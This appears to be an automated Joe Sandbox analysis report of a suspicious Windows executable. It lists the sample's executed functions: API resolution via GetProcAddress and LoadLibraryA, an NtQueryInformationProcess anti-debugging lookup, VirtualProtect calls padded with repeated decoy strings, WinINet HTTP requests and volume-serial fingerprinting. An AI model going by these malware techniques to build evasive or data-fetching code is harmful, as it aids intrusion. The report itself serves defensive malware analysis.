c84e0a 39012->39013 39014 c9abb0 lstrcpy 39013->39014 39015 c84e16 39014->39015 39016 c84e37 lstrlen 39015->39016 39017 c84e4a 39016->39017 39018 c84e53 lstrlen 39017->39018 39106 c9ade0 39018->39106 39020 c84e63 HttpSendRequestA 39021 c84e82 InternetReadFile 39020->39021 39022 c84eb7 InternetCloseHandle 39021->39022 39027 c84eae 39021->39027 39025 c9ab10 39022->39025 39024 c9acc0 4 API calls 39024->39027 39025->38947 39026 c9abb0 lstrcpy 39026->39027 39027->39021 39027->39022 39027->39024 39027->39026 39113 c9ade0 39028->39113 39030 c91a14 StrCmpCA 39031 c91a1f ExitProcess 39030->39031 39032 c91a27 39030->39032 39033 c91c12 39032->39033 39034 c91aad StrCmpCA 39032->39034 39035 c91acf StrCmpCA 39032->39035 39036 c91b41 StrCmpCA 39032->39036 39037 c91ba1 StrCmpCA 39032->39037 39038 c91bc0 StrCmpCA 39032->39038 39039 c91b63 StrCmpCA 39032->39039 39040 c91b82 StrCmpCA 39032->39040 39041 c91afd StrCmpCA 39032->39041 39042 c91b1f StrCmpCA 39032->39042 39043 c9ab30 lstrlen lstrcpy 39032->39043 39033->37951 39034->39032 39035->39032 39036->39032 39037->39032 39038->39032 39039->39032 39040->39032 39041->39032 39042->39032 39043->39032 39044->37957 39045->37959 39046->37965 39047->37967 39048->37973 39049->37975 39050->37979 39051->37983 39052->37987 39053->37993 39054->37995 39055->37999 39056->38013 39057->38017 39058->38016 39059->38012 39060->38016 39061->38034 39062->38019 39063->38023 39064->38025 39065->38030 39066->38031 39067->38037 39068->38044 39069->38046 39070->38070 39071->38073 39072->38074 39073->38069 39074->38074 39075->38083 39078 c9aab0 lstrcpy 39077->39078 39079 c816c3 39078->39079 39080 c9aab0 lstrcpy 39079->39080 39081 c816d5 39080->39081 39082 c9aab0 lstrcpy 39081->39082 39083 c816e7 39082->39083 39084 c9aab0 lstrcpy 39083->39084 39085 c815a3 39084->39085 39085->38810 39087 c84816 39086->39087 39088 c84888 lstrlen 39087->39088 39112 c9ade0 39088->39112 39090 c84898 InternetCrackUrlA 39091 c848b7 39090->39091 39091->38887 39093 c9aa50 lstrcpy 39092->39093 39094 c98d04 39093->39094 39095 c9aa50 lstrcpy 39094->39095 39096 c98d12 GetSystemTime 39095->39096 39097 c98d29 39096->39097 39098 c9aab0 lstrcpy 39097->39098 39099 c98d8c 39098->39099 39099->38902 39101 c9ac41 39100->39101 39102 c9ac98 39101->39102 39104 c9ac78 lstrcpy lstrcat 39101->39104 39103 c9aab0 lstrcpy 39102->39103 39105 c9aca4 39103->39105 39104->39102 39105->38905 39106->39020 39108 c8a249 LocalAlloc 39107->39108 39109 c84f3e 39107->39109 39108->39109 39110 c8a264 CryptStringToBinaryA 39108->39110 39109->38908 39109->38911 39110->39109 39111 c8a289 LocalFree 39110->39111 39111->39109 39112->39090 39113->39030

                                    Executed Functions

                                    Function 00C99BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 c99bb0-c99bc4 call c99aa0 663 c99bca-c99dde call c99ad0 GetProcAddress * 21 660->663 664 c99de3-c99e42 LoadLibraryA * 5 660->664 663->664 666 c99e5d-c99e64 664->666 667 c99e44-c99e58 GetProcAddress 664->667 669 c99e96-c99e9d 666->669 670 c99e66-c99e91 GetProcAddress * 2 666->670 667->666 671 c99eb8-c99ebf 669->671 672 c99e9f-c99eb3 GetProcAddress 669->672 670->669 673 c99ed9-c99ee0 671->673 674 c99ec1-c99ed4 GetProcAddress 671->674 672->671 675 c99f11-c99f12 673->675 676 c99ee2-c99f0c GetProcAddress * 2 673->676 674->673 676->675
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,01520600), ref: 00C99BF1
                                    • GetProcAddress.KERNEL32(75900000,015207C8), ref: 00C99C0A
                                    • GetProcAddress.KERNEL32(75900000,015206F0), ref: 00C99C22
                                    • GetProcAddress.KERNEL32(75900000,01520618), ref: 00C99C3A
                                    • GetProcAddress.KERNEL32(75900000,015207F8), ref: 00C99C53
                                    • GetProcAddress.KERNEL32(75900000,01528BB0), ref: 00C99C6B
                                    • GetProcAddress.KERNEL32(75900000,01516400), ref: 00C99C83
                                    • GetProcAddress.KERNEL32(75900000,01516440), ref: 00C99C9C
                                    • GetProcAddress.KERNEL32(75900000,01520810), ref: 00C99CB4
                                    • GetProcAddress.KERNEL32(75900000,01520678), ref: 00C99CCC
                                    • GetProcAddress.KERNEL32(75900000,015206A8), ref: 00C99CE5
                                    • GetProcAddress.KERNEL32(75900000,01520828), ref: 00C99CFD
                                    • GetProcAddress.KERNEL32(75900000,015162A0), ref: 00C99D15
                                    • GetProcAddress.KERNEL32(75900000,01520840), ref: 00C99D2E
                                    • GetProcAddress.KERNEL32(75900000,015206C0), ref: 00C99D46
                                    • GetProcAddress.KERNEL32(75900000,01516420), ref: 00C99D5E
                                    • GetProcAddress.KERNEL32(75900000,015206D8), ref: 00C99D77
                                    • GetProcAddress.KERNEL32(75900000,015208D0), ref: 00C99D8F
                                    • GetProcAddress.KERNEL32(75900000,01516640), ref: 00C99DA7
                                    • GetProcAddress.KERNEL32(75900000,01520900), ref: 00C99DC0
                                    • GetProcAddress.KERNEL32(75900000,01516300), ref: 00C99DD8
                                    • LoadLibraryA.KERNEL32(01520918,?,00C96CA0), ref: 00C99DEA
                                    • LoadLibraryA.KERNEL32(015208E8,?,00C96CA0), ref: 00C99DFB
                                    • LoadLibraryA.KERNEL32(015208A0,?,00C96CA0), ref: 00C99E0D
                                    • LoadLibraryA.KERNEL32(01520858,?,00C96CA0), ref: 00C99E1F
                                    • LoadLibraryA.KERNEL32(01520870,?,00C96CA0), ref: 00C99E30
                                    • GetProcAddress.KERNEL32(75070000,01520888), ref: 00C99E52
                                    • GetProcAddress.KERNEL32(75FD0000,015208B8), ref: 00C99E73
                                    • GetProcAddress.KERNEL32(75FD0000,01528E20), ref: 00C99E8B
                                    • GetProcAddress.KERNEL32(75A50000,01528C10), ref: 00C99EAD
                                    • GetProcAddress.KERNEL32(74E50000,01516520), ref: 00C99ECE
                                    • GetProcAddress.KERNEL32(76E80000,01528B40), ref: 00C99EEF
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00C99F06
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00C99EFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: c1bacf335adb65764304bd90b5dd7f36d40a79582c25e8fac50bb3adfb4e0f78
                                    • Instruction ID: ad2da89b77933a1d8ae0255914d0a4efb2a8f7f60b783d619082f3713a5aa475
                                    • Opcode Fuzzy Hash: c1bacf335adb65764304bd90b5dd7f36d40a79582c25e8fac50bb3adfb4e0f78
                                    • Instruction Fuzzy Hash: B9A13EB5518708AFC384EFA8FC889567BB9A74D303B50861ABB19C3671D734A941FF60
                                    Function 00C84610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 c84610-c846e5 RtlAllocateHeap 781 c846f0-c846f6 764->781 782 c846fc-c8479a 781->782 783 c8479f-c847f9 VirtualProtect 781->783 782->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C8465F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00C847EC
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84667
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C8467D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84728
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C847CB
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C8479F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C846B2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C846A7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84707
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84693
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84763
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84672
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84688
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C846BD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C847B5
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C8476E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C846D3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C846FC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C8471D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C847AA
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C847C0
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84784
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84712
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C8478F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C8462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84779
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C84638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C846C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: 4eccec2a160741fe6c1628c04b2ee7b709a9e2e10987c9057be3fc935ddfda48
                                    • Instruction ID: ec5f730de2abb4036f1bf26b55308422204d9c1a8404ff3c57180740e7bc092d
                                    • Opcode Fuzzy Hash: 4eccec2a160741fe6c1628c04b2ee7b709a9e2e10987c9057be3fc935ddfda48
                                    • Instruction Fuzzy Hash: 364103607D2615FFC62CF7EE88CEEDD7662DFC770AF40985AAA0A522C3C6B055004725
                                    Function 00C862D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1033 c862d0-c8635b call c9aab0 call c84800 call c9aa50 InternetOpenA StrCmpCA 1040 c8635d 1033->1040 1041 c86364-c86368 1033->1041 1040->1041 1042 c86559-c86575 call c9aab0 call c9ab10 * 2 1041->1042 1043 c8636e-c86392 InternetConnectA 1041->1043 1061 c86578-c8657d 1042->1061 1044 c86398-c8639c 1043->1044 1045 c8654f-c86553 InternetCloseHandle 1043->1045 1047 c863aa 1044->1047 1048 c8639e-c863a8 1044->1048 1045->1042 1050 c863b4-c863e2 HttpOpenRequestA 1047->1050 1048->1050 1052 c863e8-c863ec 1050->1052 1053 c86545-c86549 InternetCloseHandle 1050->1053 1055 c863ee-c8640f InternetSetOptionA 1052->1055 1056 c86415-c86455 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1059 c8647c-c8649b call c98ad0 1056->1059 1060 c86457-c86477 call c9aa50 call c9ab10 * 2 1056->1060 1066 c86519-c86539 call c9aa50 call c9ab10 * 2 1059->1066 1067 c8649d-c864a4 1059->1067 1060->1061 1066->1061 1070 c864a6-c864d0 InternetReadFile 1067->1070 1071 c86517-c8653f InternetCloseHandle 1067->1071 1075 c864db 1070->1075 1076 c864d2-c864d9 1070->1076 1071->1053 1075->1071 1076->1075 1080 c864dd-c86515 call c9acc0 call c9abb0 call c9ab10 1076->1080 1080->1070
                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C84800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C84889
                                      • Part of subcall function 00C84800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C84899
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • InternetOpenA.WININET(00CA0DFF,00000001,00000000,00000000,00000000), ref: 00C86331
                                    • StrCmpCA.SHLWAPI(?,0152E3C0), ref: 00C86353
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C86385
                                    • HttpOpenRequestA.WININET(00000000,GET,?,0152DA28,00000000,00000000,00400100,00000000), ref: 00C863D5
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C8640F
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C86421
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00C8644D
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C864BD
                                    • InternetCloseHandle.WININET(00000000), ref: 00C8653F
                                    • InternetCloseHandle.WININET(00000000), ref: 00C86549
                                    • InternetCloseHandle.WININET(00000000), ref: 00C86553
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: d29e81c6b70504a4d95a243679b32b72a2986bb177df775e275fcd0821a7eabe
                                    • Instruction ID: 68f06181619d11ec3686ea44baa216d79e69c398e0127cf060c4702985d53bd5
                                    • Opcode Fuzzy Hash: d29e81c6b70504a4d95a243679b32b72a2986bb177df775e275fcd0821a7eabe
                                    • Instruction Fuzzy Hash: 5E716F71A00318ABDF14EFA0DC59FEE7779AB44705F108198F60A6B190DBB06B84DF95
                                    Function 00C97690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 c97690-c976da GetWindowsDirectoryA 1357 c976dc 1356->1357 1358 c976e3-c97757 GetVolumeInformationA call c98e90 * 3 1356->1358 1357->1358 1365 c97768-c9776f 1358->1365 1366 c9778c-c977a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 c97771-c9778a call c98e90 1365->1367 1369 c977a9-c977b6 call c9aa50 1366->1369 1370 c977b8-c977e8 wsprintfA call c9aa50 1366->1370 1367->1365 1377 c9780e-c9781e 1369->1377 1370->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C976D2
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C9770F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C97793
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C9779A
                                    • wsprintfA.USER32 ref: 00C977D0
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: 1b7c21286ecb24b2676c457172191cd8fe8eacf7729b27af10cc0242968530e0
                                    • Instruction ID: ac26d84c51a85a0fe20628309b7cc48d8dfc39b3bc32203e245bfaf57f2104eb
                                    • Opcode Fuzzy Hash: 1b7c21286ecb24b2676c457172191cd8fe8eacf7729b27af10cc0242968530e0
                                    • Instruction Fuzzy Hash: 984191B1D04348ABDF10DB94DC89BDEBBB8AF08704F100199F609AB280D775AA44DBA5
